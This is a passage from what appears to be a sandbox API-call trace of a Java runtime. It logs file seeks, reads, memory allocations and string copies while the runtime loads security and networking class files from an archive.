lpNewFilePointer=0x208c1f0*=27225431) returned 1 [0104.557] ReadFile (in: hFile=0x134, lpBuffer=0x208c240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1c0, lpOverlapped=0x0 | out: lpBuffer=0x208c240*, lpNumberOfBytesRead=0x208c1c0*=0x1e, lpOverlapped=0x0) returned 1 [0104.557] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f6d96, lpNewFilePointer=0x208c250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c250*=27225494) returned 1 [0104.557] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x6c3, lpNumberOfBytesRead=0x208c220, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c220*=0x6c3, lpOverlapped=0x0) returned 1 [0104.561] malloc (_Size=0x48) returned 0x1228ee60 [0104.561] malloc (_Size=0xa0) returned 0x122ea270 [0104.561] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3348075, lpNewFilePointer=0x208c980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c980*=53772405) returned 1 [0104.561] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c950, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c950*=0xa0, lpOverlapped=0x0) returned 1 [0104.561] malloc (_Size=0x1e) returned 0x12221ea0 [0104.561] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f1725, lpNewFilePointer=0x208c580, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c580*=27203365) returned 1 [0104.562] ReadFile (in: hFile=0x134, lpBuffer=0x208c5d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c550, lpOverlapped=0x0 | out: lpBuffer=0x208c5d0*, lpNumberOfBytesRead=0x208c550*=0x1e, lpOverlapped=0x0) returned 1 [0104.562] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f1760, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=27203424) returned 1 [0104.562] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1f1e, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c5b0*=0x1f1e, lpOverlapped=0x0) returned 1 [0104.563] malloc (_Size=0x48) returned 0x1228ea00 [0104.563] malloc (_Size=0xa0) returned 0x122ea270 [0104.563] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3348026, lpNewFilePointer=0x208bec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bec0*=53772326) returned 1 [0104.563] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be90, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208be90*=0xa0, lpOverlapped=0x0) returned 1 [0104.564] malloc (_Size=0x22) returned 0x12221ae0 [0104.564] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f1600, lpNewFilePointer=0x208bac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bac0*=27203072) returned 1 [0104.564] ReadFile (in: hFile=0x134, lpBuffer=0x208bb10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ba90, lpOverlapped=0x0 | out: lpBuffer=0x208bb10*, lpNumberOfBytesRead=0x208ba90*=0x1e, lpOverlapped=0x0) returned 1 [0104.564] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f163f, lpNewFilePointer=0x208bb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb20*=27203135) returned 1 [0104.564] ReadFile (in: hFile=0x134, lpBuffer=0x122801e0, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x208baf0, lpOverlapped=0x0 | out: lpBuffer=0x122801e0*, lpNumberOfBytesRead=0x208baf0*=0xe6, lpOverlapped=0x0) returned 1 [0104.566] malloc (_Size=0x48) returned 0x1228e5a0 [0104.567] malloc (_Size=0xa0) returned 0x122ea270 [0104.567] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416b2f, lpNewFilePointer=0x208c9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9f0*=54618927) returned 1 [0104.567] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c9c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c9c0*=0xa0, lpOverlapped=0x0) returned 1 [0104.570] malloc (_Size=0x21) returned 0x12221ea0 [0104.570] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30929fc, lpNewFilePointer=0x208c5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5f0*=50932220) returned 1 [0104.570] ReadFile (in: hFile=0x134, lpBuffer=0x208c640, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c5c0, lpOverlapped=0x0 | out: lpBuffer=0x208c640*, lpNumberOfBytesRead=0x208c5c0*=0x1e, lpOverlapped=0x0) returned 1 [0104.572] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3092a3a, lpNewFilePointer=0x208c650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c650*=50932282) returned 1 [0104.572] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xa15, lpNumberOfBytesRead=0x208c620, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c620*=0xa15, lpOverlapped=0x0) returned 1 [0104.574] malloc (_Size=0x48) returned 0x1228ed20 [0104.574] malloc (_Size=0xa0) returned 0x122ea270 [0104.574] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415509, lpNewFilePointer=0x208ca50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca50*=54613257) returned 1 [0104.574] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca20, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208ca20*=0xa0, lpOverlapped=0x0) returned 1 [0104.574] malloc (_Size=0x21) returned 0x12221ae0 [0104.574] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3055fa7, lpNewFilePointer=0x208c650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c650*=50683815) returned 1 [0104.575] ReadFile (in: hFile=0x134, lpBuffer=0x208c6a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c620, lpOverlapped=0x0 | out: lpBuffer=0x208c6a0*, lpNumberOfBytesRead=0x208c620*=0x1e, lpOverlapped=0x0) returned 1 [0104.576] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3055fe5, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=50683877) returned 1 [0104.576] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x55a, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c680*=0x55a, lpOverlapped=0x0) returned 1 [0104.578] malloc (_Size=0x48) returned 0x1228e9b0 [0104.578] malloc (_Size=0xa0) returned 0x122ea270 [0104.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2e46, lpNewFilePointer=0x208caa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caa0*=54406726) returned 1 [0104.578] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca70, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208ca70*=0xa0, lpOverlapped=0x0) returned 1 [0104.579] malloc (_Size=0x48) returned 0x1228e410 [0104.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2948211, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=43287057) returned 1 [0104.579] ReadFile (in: hFile=0x134, lpBuffer=0x208c6f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x208c6f0*, lpNumberOfBytesRead=0x208c670*=0x1e, lpOverlapped=0x0) returned 1 [0104.580] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2948276, lpNewFilePointer=0x208c700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c700*=43287158) returned 1 [0104.580] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x5d0, lpNumberOfBytesRead=0x208c6d0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c6d0*=0x5d0, lpOverlapped=0x0) returned 1 [0104.580] malloc (_Size=0x48) returned 0x1228eaf0 [0104.580] malloc (_Size=0xa0) returned 0x122ea270 [0104.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2c80, lpNewFilePointer=0x208c060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c060*=54406272) returned 1 [0104.581] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c030, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c030*=0xa0, lpOverlapped=0x0) returned 1 [0104.581] malloc (_Size=0x40) returned 0x1228e870 [0104.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2944d0d, lpNewFilePointer=0x208bc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc60*=43273485) returned 1 [0104.581] ReadFile (in: hFile=0x134, lpBuffer=0x208bcb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc30, lpOverlapped=0x0 | out: lpBuffer=0x208bcb0*, lpNumberOfBytesRead=0x208bc30*=0x1e, lpOverlapped=0x0) returned 1 [0104.587] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2944d6a, lpNewFilePointer=0x208bcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcc0*=43273578) returned 1 [0104.587] ReadFile (in: hFile=0x134, lpBuffer=0x1227e8e0, nNumberOfBytesToRead=0x768, lpNumberOfBytesRead=0x208bc90, lpOverlapped=0x0 | out: lpBuffer=0x1227e8e0*, lpNumberOfBytesRead=0x208bc90*=0x768, lpOverlapped=0x0) returned 1 [0104.589] malloc (_Size=0x48) returned 0x1228ef00 [0104.589] malloc (_Size=0xa0) returned 0x122ea270 [0104.589] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2ebb, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54406843) returned 1 [0104.589] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0104.589] malloc (_Size=0x47) returned 0x1228e9b0 [0104.589] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2948846, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=43288646) returned 1 [0104.589] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0104.589] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29488aa, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=43288746) returned 1 [0104.589] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xe83, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c6e0*=0xe83, lpOverlapped=0x0) returned 1 [0104.591] malloc (_Size=0x48) returned 0x1228eb90 [0104.591] malloc (_Size=0xa0) returned 0x122ea270 [0104.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2c0a, lpNewFilePointer=0x208c7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7e0*=54406154) returned 1 [0104.591] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7b0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c7b0*=0xa0, lpOverlapped=0x0) returned 1 [0104.591] malloc (_Size=0x49) returned 0x12228f40 [0104.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294446d, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=43271277) returned 1 [0104.592] ReadFile (in: hFile=0x134, lpBuffer=0x208c430, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x208c430*, lpNumberOfBytesRead=0x208c3b0*=0x1e, lpOverlapped=0x0) returned 1 [0104.592] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29444d3, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=43271379) returned 1 [0104.592] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x83a, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c410*=0x83a, lpOverlapped=0x0) returned 1 [0104.593] malloc (_Size=0x48) returned 0x1228ed20 [0104.593] malloc (_Size=0xa0) returned 0x122ea270 [0104.593] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2ba6, lpNewFilePointer=0x208c8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8f0*=54406054) returned 1 [0104.593] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c8c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c8c0*=0xa0, lpOverlapped=0x0) returned 1 [0104.593] malloc (_Size=0x37) returned 0x12298f80 [0104.593] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2943ffb, lpNewFilePointer=0x208c4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4f0*=43270139) returned 1 [0104.593] ReadFile (in: hFile=0x134, lpBuffer=0x208c540, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c4c0, lpOverlapped=0x0 | out: lpBuffer=0x208c540*, lpNumberOfBytesRead=0x208c4c0*=0x1e, lpOverlapped=0x0) returned 1 [0104.598] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294404f, lpNewFilePointer=0x208c550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c550*=43270223) returned 1 [0104.598] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x41e, lpNumberOfBytesRead=0x208c520, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c520*=0x41e, lpOverlapped=0x0) returned 1 [0104.603] malloc (_Size=0x48) returned 0x1228ee10 [0104.603] malloc (_Size=0xa0) returned 0x122ea270 [0104.603] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb061e, lpNewFilePointer=0x208ded0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ded0*=722462) returned 1 [0104.603] ReadFile (in: hFile=0x2c0, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dea0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208dea0*=0xa0, lpOverlapped=0x0) returned 1 [0104.603] malloc (_Size=0x15) returned 0x122933f0 [0104.603] free (_Block=0x12293070) [0104.604] free (_Block=0x1228e960) [0104.604] strlen (_Str="sun/security/util/ManifestEntryVerifier.class") returned 0x2d [0104.605] malloc (_Size=0x48) returned 0x1228e460 [0104.605] malloc (_Size=0xa0) returned 0x122ea270 [0104.605] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34054ae, lpNewFilePointer=0x208d5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5c0*=54547630) returned 1 [0104.605] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d590, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d590*=0xa0, lpOverlapped=0x0) returned 1 [0104.605] malloc (_Size=0x2e) returned 0x12298540 [0104.605] strlen (_Str="sun/security/util/ManifestEntryVerifier.class") returned 0x2d [0104.605] strcpy (in: _Dest=0x208d740, _Source="sun/security/util/ManifestEntryVerifier.class" | out: _Dest="sun/security/util/ManifestEntryVerifier.class") returned="sun/security/util/ManifestEntryVerifier.class" [0104.605] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2df4bdb, lpNewFilePointer=0x208d1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1c0*=48188379) returned 1 [0104.605] ReadFile (in: hFile=0x134, lpBuffer=0x208d210, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d190, lpOverlapped=0x0 | out: lpBuffer=0x208d210*, lpNumberOfBytesRead=0x208d190*=0x1e, lpOverlapped=0x0) returned 1 [0104.607] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2df4c26, lpNewFilePointer=0x208d220, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d220*=48188454) returned 1 [0104.607] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x137d, lpNumberOfBytesRead=0x208d1f0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d1f0*=0x137d, lpOverlapped=0x0) returned 1 [0104.608] free (_Block=0x12298f80) [0104.608] free (_Block=0x1228ed20) [0104.616] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x39, lpNewFilePointer=0x208c090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c090*=57) returned 1 [0104.617] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c0e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c060, lpOverlapped=0x0 | out: lpBuffer=0x208c0e0*, lpNumberOfBytesRead=0x208c060*=0x1e, lpOverlapped=0x0) returned 1 [0104.617] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6b, lpNewFilePointer=0x208c0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0f0*=107) returned 1 [0104.617] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c200, nNumberOfBytesToRead=0xa3, lpNumberOfBytesRead=0x208c0c0, lpOverlapped=0x0 | out: lpBuffer=0x208c200*, lpNumberOfBytesRead=0x208c0c0*=0xa3, lpOverlapped=0x0) returned 1 [0104.621] malloc (_Size=0x48) returned 0x1228e960 [0104.621] malloc (_Size=0xa0) returned 0x122ea270 [0104.621] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb0709, lpNewFilePointer=0x208dff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dff0*=722697) returned 1 [0104.621] ReadFile (in: hFile=0x2c0, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dfc0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208dfc0*=0xa0, lpOverlapped=0x0) returned 1 [0104.621] malloc (_Size=0x12) returned 0x12293410 [0104.627] strlen (_Str="sun/nio/ByteBuffered.class") returned 0x1a [0104.627] malloc (_Size=0x48) returned 0x1228e640 [0104.627] malloc (_Size=0xa0) returned 0x122ea270 [0104.627] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417e4c, lpNewFilePointer=0x208d780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d780*=54623820) returned 1 [0104.627] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d750, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d750*=0xa0, lpOverlapped=0x0) returned 1 [0104.627] malloc (_Size=0x1b) returned 0x12221ea0 [0104.627] strlen (_Str="sun/nio/ByteBuffered.class") returned 0x1a [0104.628] strcpy (in: _Dest=0x208d900, _Source="sun/nio/ByteBuffered.class" | out: _Dest="sun/nio/ByteBuffered.class") returned="sun/nio/ByteBuffered.class" [0104.628] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f0ccc, lpNewFilePointer=0x208d380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d380*=51317964) returned 1 [0104.628] ReadFile (in: hFile=0x134, lpBuffer=0x208d3d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d350, lpOverlapped=0x0 | out: lpBuffer=0x208d3d0*, lpNumberOfBytesRead=0x208d350*=0x1e, lpOverlapped=0x0) returned 1 [0104.629] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f0d04, lpNewFilePointer=0x208d3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3e0*=51318020) returned 1 [0104.629] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0xaa, lpNumberOfBytesRead=0x208d3b0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208d3b0*=0xaa, lpOverlapped=0x0) returned 1 [0104.629] free (_Block=0x12298540) [0104.630] free (_Block=0x1228e460) [0104.634] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x465, lpNewFilePointer=0x208c320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c320*=1125) returned 1 [0104.634] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c370, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2f0, lpOverlapped=0x0 | out: lpBuffer=0x208c370*, lpNumberOfBytesRead=0x208c2f0*=0x1e, lpOverlapped=0x0) returned 1 [0104.635] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x494, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=1172) returned 1 [0104.635] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c490, nNumberOfBytesToRead=0xd53, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x208c490*, lpNumberOfBytesRead=0x208c350*=0xd53, lpOverlapped=0x0) returned 1 [0104.635] free (_Block=0x122933f0) [0104.635] free (_Block=0x1228ee10) [0104.641] strlen (_Str="java/security/Permissions.class") returned 0x1f [0104.641] malloc (_Size=0x48) returned 0x1228ea00 [0104.641] malloc (_Size=0xa0) returned 0x122ea270 [0104.641] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417dff, lpNewFilePointer=0x208d550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d550*=54623743) returned 1 [0104.641] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d520, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d520*=0xa0, lpOverlapped=0x0) returned 1 [0104.641] malloc (_Size=0x20) returned 0x12221ae0 [0104.641] strlen (_Str="java/security/Permissions.class") returned 0x1f [0104.641] strcpy (in: _Dest=0x208d6d0, _Source="java/security/Permissions.class" | out: _Dest="java/security/Permissions.class") returned="java/security/Permissions.class" [0104.641] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30efa86, lpNewFilePointer=0x208d150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d150*=51313286) returned 1 [0104.641] ReadFile (in: hFile=0x134, lpBuffer=0x208d1a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d120, lpOverlapped=0x0 | out: lpBuffer=0x208d1a0*, lpNumberOfBytesRead=0x208d120*=0x1e, lpOverlapped=0x0) returned 1 [0104.643] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30efac3, lpNewFilePointer=0x208d1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1b0*=51313347) returned 1 [0104.643] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1209, lpNumberOfBytesRead=0x208d180, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d180*=0x1209, lpOverlapped=0x0) returned 1 [0104.643] free (_Block=0x12221ea0) [0104.643] free (_Block=0x1228e640) [0104.647] strlen (_Str="java/security/PermissionCollection.class") returned 0x28 [0104.647] malloc (_Size=0x48) returned 0x1228ea50 [0104.647] malloc (_Size=0xa0) returned 0x122ea270 [0104.647] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417da9, lpNewFilePointer=0x208cb10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb10*=54623657) returned 1 [0104.647] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cae0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cae0*=0xa0, lpOverlapped=0x0) returned 1 [0104.647] malloc (_Size=0x29) returned 0x12298d00 [0104.648] strlen (_Str="java/security/PermissionCollection.class") returned 0x28 [0104.648] strcpy (in: _Dest=0x208cc90, _Source="java/security/PermissionCollection.class" | out: _Dest="java/security/PermissionCollection.class") returned="java/security/PermissionCollection.class" [0104.648] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ef5da, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=51312090) returned 1 [0104.648] ReadFile (in: hFile=0x134, lpBuffer=0x208c760, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x208c760*, lpNumberOfBytesRead=0x208c6e0*=0x1e, lpOverlapped=0x0) returned 1 [0104.648] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ef620, lpNewFilePointer=0x208c770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c770*=51312160) returned 1 [0104.648] ReadFile (in: hFile=0x134, lpBuffer=0x1227f4f0, nNumberOfBytesToRead=0x466, lpNumberOfBytesRead=0x208c740, lpOverlapped=0x0 | out: lpBuffer=0x1227f4f0*, lpNumberOfBytesRead=0x208c740*=0x466, lpOverlapped=0x0) returned 1 [0104.649] free (_Block=0x12221ae0) [0104.649] free (_Block=0x1228ea00) [0104.665] strlen (_Str="sun/net/www/protocol/file/FileURLConnection.class") returned 0x31 [0104.665] malloc (_Size=0x48) returned 0x1228e730 [0104.665] malloc (_Size=0xa0) returned 0x122ea270 [0104.665] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417d4a, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3d0*=54623562) returned 1 [0104.665] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d3a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d3a0*=0xa0, lpOverlapped=0x0) returned 1 [0104.665] malloc (_Size=0x32) returned 0x12299040 [0104.666] strlen (_Str="sun/net/www/protocol/file/FileURLConnection.class") returned 0x31 [0104.666] strcpy (in: _Dest=0x208d550, _Source="sun/net/www/protocol/file/FileURLConnection.class" | out: _Dest="sun/net/www/protocol/file/FileURLConnection.class") returned="sun/net/www/protocol/file/FileURLConnection.class" [0104.666] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ee20f, lpNewFilePointer=0x208cfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfd0*=51307023) returned 1 [0104.666] ReadFile (in: hFile=0x134, lpBuffer=0x208d020, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cfa0, lpOverlapped=0x0 | out: lpBuffer=0x208d020*, lpNumberOfBytesRead=0x208cfa0*=0x1e, lpOverlapped=0x0) returned 1 [0104.668] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ee25e, lpNewFilePointer=0x208d030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d030*=51307102) returned 1 [0104.668] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x137c, lpNumberOfBytesRead=0x208d000, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d000*=0x137c, lpOverlapped=0x0) returned 1 [0104.669] free (_Block=0x12298d00) [0104.669] free (_Block=0x1228ea50) [0104.673] strlen (_Str="sun/net/www/URLConnection.class") returned 0x1f [0104.673] malloc (_Size=0x48) returned 0x1228e230 [0104.673] malloc (_Size=0xa0) returned 0x122ea270 [0104.673] SetFilePointerEx (in: hFile=0x134, 